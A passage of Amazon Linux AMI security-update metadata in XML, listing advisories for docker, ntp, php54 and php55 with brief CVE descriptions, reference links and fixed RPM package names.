release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.9-1.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-461</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-461: critical priority package update for docker</title><issued date="2014-12-11 16:40:00" /><updated date="2014-12-11 16:50:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9358:
1172787:
CVE-2014-9358 docker: Path traversal and spoofing opportunities presented through image identifiers
CVE-2014-9357:
1172782:
CVE-2014-9357 docker: Escalation of privileges during decompression of LZMA archives
CVE-2014-9356:
1172761:
CVE-2014-9356 docker: Path traversal during processing of absolute symlinks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9356" title="" id="CVE-2014-9356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9357" title="" id="CVE-2014-9357" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9358" title="" id="CVE-2014-9358" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-devel" version="1.3.3" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.3.3-1.0.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.3.3" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.3.3-1.0.amzn1.x86_64.rpm</filename></package><package name="docker" version="1.3.3" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.3.3-1.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-462</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-462: important priority package update for ntp</title><issued date="2014-12-19 14:00:00" /><updated date="2014-12-19 14:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9296:
A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism.
1176040:
CVE-2014-9296 ntp: receive() missing return on error
CVE-2014-9295:
Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(), ctl_putdata(), and configure() functions. A remote attacker could use either of these flaws to send a specially crafted request packet that could crash ntpd or, potentially, execute arbitrary code with the privileges of the ntp user. Note: the crypto_recv() flaw requires non default configurations to be active, while the ctl_putdata() flaw, by default, can only be exploited via local attackers, and the configure() flaw requires additional authentication to exploit.
1176037:
CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets
CVE-2014-9294:
It was found that ntp-keygen used a weak method for generating MD5 keys. This could possibly allow an attacker to guess generated MD5 keys that could then be used to spoof an NTP client or server. Note: it is recommended to regenerate any MD5 keys that had explicitly been generated with ntp-keygen; the default installation does not contain such keys).
1176035:
CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys
CVE-2014-9293:
It was found that ntpd automatically generated weak keys for its internal use if no ntpdc request authentication key was specified in the ntp.conf configuration file. A remote attacker able to match the configured IP restrictions could guess the generated key, and possibly use it to send ntpdc query or configuration requests.
1176032:
CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293" title="" id="CVE-2014-9293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294" title="" id="CVE-2014-9294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295" title="" id="CVE-2014-9295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296" title="" id="CVE-2014-9296" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-2.22.amzn1.noarch.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-perl-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-2.22.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-perl-4.2.6p5-2.22.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-2.22.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-2.22.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="2.22.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-2.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-463</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-463: medium priority package update for php54</title><issued date="2015-01-08 11:35:00" /><updated date="2015-01-08 11:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8142:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.
1175718:
CVE-2014-8142 php: use after free vulnerability in unserialize()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142" title="" id="CVE-2014-8142" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-enchant" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.36" release="1.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.36-1.64.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.36-1.64.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.36" release="1.64.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.36-1.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-464</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-464: medium priority package update for php55</title><issued date="2015-01-08 11:35:00" /><updated date="2015-01-08 11:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8142:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.
1175718:
CVE-2014-8142 php: use after free vulnerability in unserialize()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142" title="" id="CVE-2014-8142" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-process" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.20-2.94.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.20-2.94.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.20" release="2.94.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.20-2.94.amzn1.i686.rpm</filename></package><package 